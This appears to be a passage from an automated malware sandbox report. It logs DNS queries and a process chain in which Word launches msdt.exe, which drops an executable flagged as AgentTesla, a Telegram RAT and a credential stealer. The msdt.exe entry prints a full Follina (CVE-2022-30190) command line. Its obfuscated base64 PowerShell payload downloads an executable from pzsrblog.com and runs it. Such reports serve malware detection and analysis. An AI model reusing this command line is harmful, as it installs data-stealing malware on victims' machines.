                                                                                                                                      Dec 20, 2022 14:14:30.637578964 CET8.8.8.8192.168.2.50x3efdNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:15:35.406678915 CET8.8.8.8192.168.2.50xd4eaNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.014905930 CET8.8.8.8192.168.2.50xd9e5No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.014905930 CET8.8.8.8192.168.2.50xd9e5No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.014905930 CET8.8.8.8192.168.2.50xd9e5No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.014905930 CET8.8.8.8192.168.2.50xd9e5No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.065974951 CET8.8.8.8192.168.2.50xb93aNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.065974951 CET8.8.8.8192.168.2.50xb93aNo error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.065974951 CET8.8.8.8192.168.2.50xb93aNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.065974951 CET8.8.8.8192.168.2.50xb93aNo error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:47.446058989 CET8.8.8.8192.168.2.50x198No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.326646090 CET8.8.8.8192.168.2.50x2526No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.326646090 CET8.8.8.8192.168.2.50x2526No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.326646090 CET8.8.8.8192.168.2.50x2526No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.326646090 CET8.8.8.8192.168.2.50x2526No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.346931934 CET8.8.8.8192.168.2.50xf341No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.346931934 CET8.8.8.8192.168.2.50xf341No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.346931934 CET8.8.8.8192.168.2.50xf341No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.346931934 CET8.8.8.8192.168.2.50xf341No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:51.851346016 CET8.8.8.8192.168.2.50xa1a0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                      • pzsrblog.com
                                                                                                                                      • api.ipify.org

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:14:14:18
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                      Imagebase:0x2f0000
                                                                                                                                      File size:1937688 bytes
                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:14:14:23
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                      Imagebase:0x2d0000
                                                                                                                                      File size:466688 bytes
                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:14:14:41
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
                                                                                                                                      Imagebase:0x190000
                                                                                                                                      File size:1508352 bytes
                                                                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443795153.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:14:15:18
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
                                                                                                                                      Imagebase:0x930000
                                                                                                                                      File size:2170976 bytes
                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:14:15:19
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                      File size:43176 bytes
                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:14:15:21
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
                                                                                                                                      Imagebase:0x7ff7c8a30000
                                                                                                                                      File size:2170976 bytes
                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:14:15:22
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                      File size:43176 bytes
                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:14:15:27
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
                                                                                                                                      Imagebase:0x930000
                                                                                                                                      File size:2170976 bytes
                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:14:15:29
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                      File size:43176 bytes
                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:14:15:42
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe"
                                                                                                                                      Imagebase:0x7b0000
                                                                                                                                      File size:1187840 bytes
                                                                                                                                      MD5 hash:65FACCEC1C27EA47BF295191E93BFF41
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:14:16:13
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:{path}
                                                                                                                                      Imagebase:0xad0000
                                                                                                                                      File size:1187840 bytes
                                                                                                                                      MD5 hash:65FACCEC1C27EA47BF295191E93BFF41
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.622387434.0000000003114000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:14:16:42
                                                                                                                                      Start date:20/12/2022
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe"
                                                                                                                                      Imagebase:0xa60000
                                                                                                                                      File size:1187840 bytes
                                                                                                                                      MD5 hash:65FACCEC1C27EA47BF295191E93BFF41
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 38%, ReversingLabs

                                                                                                                                      No disassembly